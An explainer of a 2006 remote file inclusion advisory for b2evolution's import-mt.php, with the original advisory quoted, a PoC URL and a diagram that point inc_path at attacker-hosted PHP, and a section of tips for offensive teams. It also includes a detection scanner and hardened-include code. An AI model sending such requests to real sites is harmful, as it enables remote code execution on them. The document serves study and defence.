b2evolution 1.8.5 < 1.9b 'import-mt.php' Remote File Inclusion Explained

What this paper is
This paper details a Remote File Inclusion (RFI) vulnerability found in b2evolution versions 1.8.5 up to, but not including, 1.9 beta. The vulnerability exists in the import-mt.php script. An attacker can exploit this to include and execute arbitrary PHP code hosted on a remote server, provided certain PHP configurations are enabled on the victim's server.
Simple technical breakdown
The core of the problem lies in how the import-mt.php script handles user-supplied input for the $inc_path variable. This variable is used to construct a path to include other PHP files. If register_globals and allow_url_fopen are enabled in PHP, an attacker can manipulate $inc_path to point to a malicious PHP file on a remote server. The script then includes this remote file as if it were a local file, leading to code execution.
Complete code and payload walkthrough
The exploit paper itself does not contain the full source code of import-mt.php or the payload. It only shows a snippet of the relevant line and the Proof of Concept (PoC) URL.
Relevant code snippet from the paper:

// Line 67 of import-mt.php (blogs/inc/CONTROL/imports):
require_once $inc_path.'MODEL/files/_file.funcs.php';

Explanation of the snippet:
- Purpose: This line attempts to include a PHP file named _file.funcs.php, which is expected to be located in a MODEL/files/ subdirectory relative to the path held in the $inc_path variable. The require_once construct ensures that the file is included only once, preventing redefinition errors.
- Inputs: The $inc_path variable.
- Behavior: It concatenates the value of $inc_path with the string 'MODEL/files/_file.funcs.php' and then attempts to include the resulting path.
- Output: If the file is successfully included, the code within it is executed. If not, a fatal error occurs.
Proof of Concept (PoC) URL:

http://<victim>/<b2epath>/inc/CONTROL/imports/import-mt.php?basepath=foo&inc_path=https://tiifp.org/tarkus/PoC/

Explanation of the PoC URL:
- http://<victim>/<b2epath>/inc/CONTROL/imports/import-mt.php: The target script on the vulnerable b2evolution installation.
- ?basepath=foo: The basepath parameter is present, but the paper does not detail its role. It likely influences path construction or is simply ignored in this specific exploit.
- &inc_path=https://tiifp.org/tarkus/PoC/: The critical parameter.
  - Purpose: It overrides the default $inc_path variable.
  - Behavior: When register_globals is On, user-supplied GET/POST parameters are automatically registered as global variables, so the value https://tiifp.org/tarkus/PoC/ is assigned to $inc_path.
  - Result: The require_once statement in the script effectively becomes require_once 'https://tiifp.org/tarkus/PoC/MODEL/files/_file.funcs.php';.
  - Prerequisites:
    - register_globals = On: Required for the inc_path parameter to populate the $inc_path global variable directly.
    - allow_url_fopen = On: Lets PHP treat URLs as files, enabling require_once (and the other file inclusion functions) to fetch content from remote locations.
Payload (Implied):
The attacker would host a PHP file (e.g., shell.php) on a server they control (e.g., https://tiifp.org/tarkus/PoC/). This shell.php file would contain malicious PHP code, such as a web shell, that executes commands on the victim's server.
The import-mt.php script, when processing the PoC URL, would then attempt to include https://tiifp.org/tarkus/PoC/MODEL/files/_file.funcs.php. If the attacker has placed a file named _file.funcs.php (or a file that the script would eventually try to include after further path manipulation) at that remote location, and that file contains malicious PHP code, that code will be executed on the victim's server.
Mapping list:
- import-mt.php: The vulnerable script.
- $inc_path: A variable used to specify the path for including other files.
- require_once $inc_path.'MODEL/files/_file.funcs.php';: The vulnerable line that uses user-controlled input to construct a file path for inclusion.
- ?inc_path=https://tiifp.org/tarkus/PoC/: The exploit parameter that injects a remote URL into $inc_path.
- register_globals = On: PHP configuration that makes GET/POST parameters global variables.
- allow_url_fopen = On: PHP configuration that allows remote file inclusions.
- Remote PHP file (e.g., shell.php): The attacker-controlled file containing the malicious payload.
Practical details for offensive operations teams
- Required Access Level: Web server access with the ability to send HTTP requests. No prior authentication to the b2evolution application is typically required if the vulnerable script is accessible anonymously.
- Lab Preconditions:
  - A vulnerable b2evolution installation (1.8.5 to 1.9 beta).
  - A target server with register_globals = On and allow_url_fopen = On in its PHP configuration. These were often default settings on older PHP versions but are considered insecure and have been deprecated/removed in modern PHP.
  - An attacker-controlled server capable of hosting a PHP payload and responding to HTTP requests.
- Tooling Assumptions:
  - A web browser or an HTTP request tool (e.g., curl, Burp Suite, OWASP ZAP) to craft and send the exploit request.
  - A simple web server (e.g., Python's http.server, Apache, Nginx) to host the PHP payload.
- Execution Pitfalls:
  - PHP Configuration: The exploit depends entirely on register_globals and allow_url_fopen being enabled. If either is Off, the exploit fails. Modern PHP versions (5.3+) have these disabled by default.
  - Firewall/WAF: Network firewalls or Web Application Firewalls (WAFs) might block outgoing HTTP requests from the victim server to the attacker's server, or incoming requests to the vulnerable script.
  - Path Traversal/Sanitization: While this specific exploit leverages RFI directly, some applications have additional sanitization layers that could prevent the URL from being used as a direct path. The paper, however, implies direct use.
  - Payload File Naming: The remote file must be named so that the target script's inclusion logic reaches it. The paper suggests the remote file would be placed at https://tiifp.org/tarkus/PoC/MODEL/files/_file.funcs.php or a similar structure.
  - URL Encoding: Special characters in URLs might need proper encoding.
- Expected Telemetry:
  - Victim Server:
    - Web server access logs showing requests to import-mt.php with the inc_path parameter.
    - PHP error logs if the remote file cannot be fetched or if the payload contains syntax errors.
    - Network logs showing outgoing HTTP requests from the victim server to the attacker's server on port 80 or 443.
    - Process execution logs if the payload executes system commands.
  - Attacker Server:
    - Web server access logs showing requests from the victim's IP address to the hosted PHP payload.
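The first telemetry item above, access-log requests to import-mt.php carrying a remote URL in inc_path, can be checked mechanically. The following scanner is an added example written for this page; it is not part of the advisory or of b2evolution. It parses Combined Log Format lines, URL-decodes the query string, and flags any parameter whose value starts with a URL or stream-wrapper scheme, rating the hit higher when the script is import-mt.php and the parameter is inc_path. The three log lines are constructed for the demo and use RFC 5737 documentation addresses; the function names are this example's own.

```php
<?php
// Added example (not from the advisory): flag access-log requests whose query
// parameters carry a remote URL, the signature of the RFI described above.
// The log lines below are constructed for this demo.

$sample_log = <<<'LOG'
203.0.113.5 - - [29/Nov/2006:10:15:02 +0000] "GET /blog/inc/CONTROL/imports/import-mt.php?basepath=foo&inc_path=https://203.0.113.77/PoC/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [29/Nov/2006:10:16:40 +0000] "GET /blog/index.php?blog=1 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Nov/2006:10:17:11 +0000] "GET /blog/inc/CONTROL/imports/import-mt.php?inc_path=ftp%3A%2F%2F203.0.113.77%2Fx%2F HTTP/1.1" 200 512 "-" "curl/7.15"
LOG;

/**
 * Inspect one Combined Log Format line. Returns a finding array, or null when
 * the line is unparsable or carries no URL-valued query parameter.
 */
function scan_access_log_line(string $line): ?array
{
    // client ident user [time] "METHOD target PROTO" status ...
    if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
        return null;
    }
    $client = $m[1];
    $time   = $m[2];
    $target = $m[4];
    $status = $m[5];

    // parse_url() accepts a bare path; the query component is null if absent.
    $query = parse_url($target, PHP_URL_QUERY);
    if ($query === null || $query === false) {
        return null;
    }
    parse_str($query, $params);   // also percent-decodes, so ftp%3A%2F%2F becomes ftp://

    $hits = [];
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue;               // nested array parameters are not paths
        }
        // A scheme prefix in a parameter value is the remote-inclusion tell.
        if (preg_match('#^(?:https?|ftps?|php|data|file|expect):#i', $value)) {
            $hits[$name] = $value;
        }
    }
    if ($hits === []) {
        return null;
    }

    $path = (string) parse_url($target, PHP_URL_PATH);
    // Highest confidence when the known-vulnerable script and parameter both match.
    $exact = substr($path, -13) === 'import-mt.php' && isset($hits['inc_path']);

    return [
        'client'   => $client,
        'time'     => $time,
        'path'     => $path,
        'status'   => $status,
        'params'   => $hits,
        'severity' => $exact ? 'high' : 'medium',
    ];
}

/** Scan a whole log text and return the list of findings. */
function scan_access_log(string $log): array
{
    $findings = [];
    foreach (explode("\n", $log) as $line) {
        $finding = scan_access_log_line($line);
        if ($finding !== null) {
            $findings[] = $finding;
        }
    }
    return $findings;
}

foreach (scan_access_log($sample_log) as $f) {
    printf("[%s] %s %s %s -> %s\n",
        $f['severity'], $f['time'], $f['client'], $f['path'], json_encode($f['params']));
}
```

On the constructed input the first and third lines are reported as high (the second is clean). A status of 200 on a flagged line is worth correlating with the victim-side egress and PHP error logs listed above, because an include that actually fetched and ran the remote file typically returns 200, while a blocked fetch shows up in the PHP error log instead.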
Where this was used and when
- Context: This vulnerability was found in b2evolution, a web blogging platform. It would be exploited against websites running this specific version of b2evolution.
- Approximate Years/Dates: The paper was published on November 29, 2006. The vulnerability was reported to the vendor on November 10, 2006. Therefore, this exploit was relevant around 2006.
Defensive lessons for modern teams
- Disable register_globals: This setting has been deprecated and removed in modern PHP versions. It should always be disabled.
- Disable allow_url_fopen: While sometimes necessary for legitimate functionality, it significantly increases the risk of RFI. If required, strict controls and input validation must be in place. Modern applications should avoid relying on it.
- Input Validation and Sanitization: Never trust user input. Always validate and sanitize any data received from external sources, especially when it is used in file paths, database queries, or executed as code.
- Use Secure Inclusion Practices: When including files, use relative paths from a known, trusted base directory. Avoid using user-supplied input directly in include, require, include_once, or require_once statements.
- Keep Software Updated: Regularly update web applications and their underlying frameworks (like b2evolution) to patch known vulnerabilities.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns, including RFI attempts.
- Secure PHP Configuration: Ensure PHP is configured securely, disabling dangerous features and enabling security-related logging.
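The "secure inclusion practices" item is easier to apply with a concrete shape in front of you. The following is an added example written for this page, not b2evolution's code: it keeps the advisory's own line as a comment and then shows the hardened equivalent, combining the advisory's EVO_MAIN_INIT guard with an include root derived from the script location, an allowlist so that request data selects a key rather than a path, and a realpath() containment check. SAFE_INC_ROOT, safe_include_path(), the $ALLOWED_MODULES map and the 'module' parameter are assumptions made for the demo. One caveat the page does not mention: since PHP 5.2.0, include and require of URLs are governed by the separate allow_url_include setting (Off by default) in addition to allow_url_fopen, so on current PHP both would have to be enabled for this class of bug to be reachable remotely; the code-level fixes below do not depend on either setting.

```php
<?php
// Added example, not b2evolution's code. EVO_MAIN_INIT is the constant named in
// the advisory's workaround; SAFE_INC_ROOT, safe_include_path() and
// $ALLOWED_MODULES are assumptions made for this demo.

// --- Vulnerable shape (from the advisory, shown as a comment only) -----------
// With register_globals=On a request parameter ?inc_path=https://... silently
// becomes $inc_path, and with URL wrappers allowed require_once fetches and
// executes whatever that URL serves:
//
//     require_once $inc_path.'MODEL/files/_file.funcs.php';

// --- Hardened shape ---------------------------------------------------------

// 1. Refuse direct access (the advisory's workaround): only the front
//    controller that defines EVO_MAIN_INIT may pull this file in.
if (!defined('EVO_MAIN_INIT')) {
    die('Please, do not access this page directly.');
}

// 2. Derive the include root from the script's own location, never from the
//    request. realpath() yields an absolute, canonical, symlink-free path.
define('SAFE_INC_ROOT', realpath(__DIR__ . '/../../') . DIRECTORY_SEPARATOR);

// 3. When user input must choose a file, map it through an allowlist so the
//    request selects a key, not a path. (Second entry is hypothetical.)
$ALLOWED_MODULES = [
    'files' => 'MODEL/files/_file.funcs.php',
    'items' => 'MODEL/items/_item.funcs.php',
];

/**
 * Resolve $relative under SAFE_INC_ROOT. Returns the canonical path, or null
 * when the value carries a URL/stream scheme, contains a NUL byte, escapes the
 * root via ../ or a symlink, or does not exist.
 */
function safe_include_path(string $relative): ?string
{
    // Any scheme prefix (http://, ftp://, php://, data:, ...) is rejected outright.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative)) {
        return null;
    }
    // NUL bytes truncated paths in older PHP; never let one reach the filesystem.
    if (strpos($relative, "\0") !== false) {
        return null;
    }
    $candidate = realpath(SAFE_INC_ROOT . $relative);
    if ($candidate === false) {
        return null;                       // file does not exist
    }
    // realpath() has collapsed ../ segments; the result must still begin with the root.
    if (strncmp($candidate, SAFE_INC_ROOT, strlen(SAFE_INC_ROOT)) !== 0) {
        return null;
    }
    return $candidate;
}

// Read the selector explicitly from $_GET (never via register_globals) and
// look it up; unknown keys fall back to the default module.
$module   = $_GET['module'] ?? 'files';
$relative = $ALLOWED_MODULES[$module] ?? $ALLOWED_MODULES['files'];

$target = safe_include_path($relative);
if ($target === null) {
    http_response_code(500);
    exit('Required library missing or path rejected.');
}
require_once $target;
```

The allowlist alone already removes the attacker's control over the path; safe_include_path() is kept as a second layer so that a later refactor that starts passing a user-derived string cannot silently reintroduce the bug. Both layers work regardless of how register_globals, allow_url_fopen or allow_url_include are set.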
ASCII visual
This vulnerability is a classic example of how user input can directly influence file inclusion.

+----------------------+                                +----------------------------+
|  Attacker client     |  1. GET import-mt.php?         |  Victim server             |
|  (browser / curl)    |  inc_path=http://attacker.com/ |  (b2evolution,             |
|                      |  payload.php                   |   vulnerable import-mt.php)|
|                      | -----------------------------> |                            |
+----------------------+                                +----------------------------+
                                                                      |
                                                       register_globals=On:
                                                       $inc_path = "http://attacker.com/payload.php"
                                                                      |
                                                                      v
+----------------------+                                +----------------------------+
|  Attacker server     |  2. fetch                      |  PHP interpreter           |
|  (hosts payload.php) | <----------------------------- |  allow_url_fopen=On        |
|                      |  3. return PHP source          |  require_once fetches and  |
|                      | -----------------------------> |  executes remote payload   |
+----------------------+                                +----------------------------+

Source references
- Paper URL: https://www.exploit-db.com/papers/2864
- Raw Exploit URL: https://www.exploit-db.com/raw/2864
- Vendor: b2evolution (http://b2evolution.net/)
- Author: tarkus (tarkus (at) tiifp (dot) org)
Original Exploit-DB Content (Verbatim)
Severity: High
Title: b2evolution Remote File inclusion Vulnerability
Date: 28.11.06
Author: tarkus (tarkus (at) tiifp (dot) org)
Web: https://tiifp.org/tarkus
Vendor: b2evolution (http://b2evolution.net/)
Affected Product(s): b2evolution 1.8.5 - 1.9 beta
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Description:
------------
Line 67 of import-mt.php (blogs/inc/CONTROL/imports):
>
>require_once $inc_path.'MODEL/files/_file.funcs.php';
>
PoC:
----
http://<victim>/<b2epath>/inc/CONTROL/imports/import-mt.php?basepath=foo&inc_path=https://tiifp.org/tarkus/PoC/
register_globals and allow_url_fopen have to be On
Workaround:
-----------
Put the following line at the beginning of the file.
if( !defined('EVO_MAIN_INIT') ) die( 'Please, do not access this page \
directly.' );
Vendor Response:
----------------
Reported to Vendor: 10.11.06
Vendor response: 10.11.06
Patch in CVS: 10.11.06
# milw0rm.com [2006-11-29]